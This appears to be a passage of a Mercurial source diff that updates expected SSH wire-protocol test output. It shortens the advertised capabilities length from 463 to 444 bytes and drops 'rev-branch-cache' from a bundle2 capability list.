(sshv1 !) diff --git a/tests/test-ssh-proto-unbundle.t b/tests/test-ssh-proto-unbundle.t --- a/tests/test-ssh-proto-unbundle.t +++ b/tests/test-ssh-proto-unbundle.t @@ -56,8 +56,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -109,8 +109,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -235,8 +235,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -293,8 +293,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -359,8 +359,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -418,8 +418,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -485,8 +485,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -543,8 +543,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -609,8 +609,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -668,8 +668,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -735,8 +735,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -796,8 +796,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -865,8 +865,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -923,8 +923,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -989,8 +989,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1050,8 +1050,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1119,8 +1119,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1180,8 +1180,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1255,8 +1255,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1314,8 +1314,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1382,8 +1382,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1441,8 +1441,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1511,8 +1511,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1572,8 +1572,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1650,8 +1650,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1715,8 +1715,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1788,8 +1788,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1843,8 +1843,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1918,8 +1918,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1977,8 +1977,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command diff --git a/tests/test-ssh-proto.t b/tests/test-ssh-proto.t --- a/tests/test-ssh-proto.t +++ b/tests/test-ssh-proto.t @@ -64,7 +64,7 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -86,8 +86,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n `hg debugserve --sshstdio` works @@ -96,7 +96,7 @@ $ hg debugserve --sshstdio << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash I/O logging works @@ -106,24 +106,24 @@ > EOF e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> flush() -> None $ hg debugserve --sshstdio --logiofile $TESTTMP/io << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash $ cat $TESTTMP/io e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> flush() -> None @@ -149,8 +149,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -187,7 +187,7 @@ remote: banner: line 7 remote: banner: line 8 remote: banner: line 9 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -245,8 +245,8 @@ o> readline() -> 15: o> banner: line 9\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -297,12 +297,12 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n + o> 444\n i> write(98) -> 98: i> between\n i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 - o> readline() -> 463: + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -316,7 +316,7 @@ sending hello command sending between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -365,8 +365,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -390,7 +390,7 @@ remote: 0 remote: 0 remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -447,8 +447,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -494,8 +494,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -539,8 +539,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -609,8 +609,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Incomplete dictionary send @@ -691,8 +691,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -725,8 +725,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -768,8 +768,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -797,8 +797,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(105) -> 105: i> between\n @@ -838,8 +838,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -887,8 +887,8 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -914,7 +914,7 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n + o> 444\n Send an upgrade request to a server that doesn't support that command @@ -943,8 +943,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -962,7 +962,7 @@ sending hello command sending between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -1005,8 +1005,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n $ cd .. @@ -1081,7 +1081,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -1114,14 +1113,14 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 447\n - o> readline() -> 447: + o> 428\n + o> readline() -> 428: o> capabilities: branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Multiple upgrades is not allowed @@ -1152,8 +1151,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(45) -> 45: i> upgrade another-token proto=irrelevant\n @@ -1224,8 +1223,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup 